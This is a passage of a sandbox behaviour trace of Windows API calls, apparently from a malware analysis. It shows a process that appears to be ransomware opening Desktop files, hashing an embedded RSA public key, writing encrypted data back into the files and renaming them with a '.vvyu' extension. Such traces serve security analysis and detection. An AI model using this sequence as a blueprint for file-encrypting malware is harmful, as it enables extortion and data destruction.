hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0183.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0183.971] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x14fd2, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x14fd2, lpOverlapped=0x0) returned 1 [0183.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0183.972] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x14fd7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.972] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0183.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0183.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0183.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.974] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0183.975] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.975] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.975] CloseHandle (hObject=0x584) returned 1 [0183.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0183.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d41908 [0183.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0183.977] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\nXSjMsaaHggbTx9Qy.rtf" (normalized: "c:\\users\\keecfmwgj\\desktop\\nxsjmsaahggbtx9qy.rtf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\nXSjMsaaHggbTx9Qy.rtf.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\nxsjmsaahggbtx9qy.rtf.vvyu")) returned 1 [0183.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.979] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0183.982] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd66add0, ftCreationTime.dwHighDateTime=0x1d8a4f7, ftLastAccessTime.dwLowDateTime=0xc1cdefe0, ftLastAccessTime.dwHighDateTime=0x1d8a6b5, ftLastWriteTime.dwLowDateTime=0xc1cdefe0, ftLastWriteTime.dwHighDateTime=0x1d8a6b5, nFileSizeHigh=0x0, nFileSizeLow=0x17ca6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="o5GqCe9ZgNw7JzfwVH.gif", cAlternateFileName="O5GQCE~1.GIF")) returned 1 [0183.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d310f0 [0183.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0183.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d310f0 | out: hHeap=0x6a0000) returned 1 [0183.982] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\o5GqCe9ZgNw7JzfwVH.gif") returned=".gif" [0183.982] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\o5GqCe9ZgNw7JzfwVH.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\o5gqce9zgnw7jzfwvh.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.983] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=97446) returned 1 [0183.983] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.985] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17c80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.986] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.987] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.987] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x17ca6, lpOverlapped=0x0) returned 1 [0183.987] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0183.988] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.988] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.988] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.989] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.989] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.989] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.989] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.989] GetLastError () returned 0x0 [0183.989] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.989] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0183.989] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.989] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.990] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x17cb0) returned 0x2d43778 [0183.990] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0183.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0183.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d310f0 [0183.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e810 [0183.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31138 [0183.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e828 [0183.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e858 [0183.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8b8 [0183.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e870 [0183.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0183.991] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0183.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0183.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e858 | out: hHeap=0x6a0000) returned 1 [0183.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e870 | out: hHeap=0x6a0000) returned 1 [0183.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8b8 | out: hHeap=0x6a0000) returned 1 [0183.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8b8 [0183.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0183.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e870 [0183.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e858 [0183.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0183.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0183.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e870 | out: hHeap=0x6a0000) returned 1 [0183.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e858 | out: hHeap=0x6a0000) returned 1 [0183.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8b8 | out: hHeap=0x6a0000) returned 1 [0183.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0183.994] GetCurrentThreadId () returned 0x264 [0183.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6ce9b0 [0183.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.994] GetCurrentThreadId () returned 0x264 [0183.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8b8 [0183.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e858 [0183.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0183.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e870 [0183.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e840 [0183.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8d0 [0183.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0183.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8a0 [0183.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e888 [0183.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8e8 [0183.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e888 | out: hHeap=0x6a0000) returned 1 [0183.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e888 [0183.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8a0 | out: hHeap=0x6a0000) returned 1 [0183.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0183.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e858 | out: hHeap=0x6a0000) returned 1 [0183.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e858 [0183.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0183.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8b8 | out: hHeap=0x6a0000) returned 1 [0183.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8e8 | out: hHeap=0x6a0000) returned 1 [0183.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0183.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e858 | out: hHeap=0x6a0000) returned 1 [0183.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0183.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0184.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: 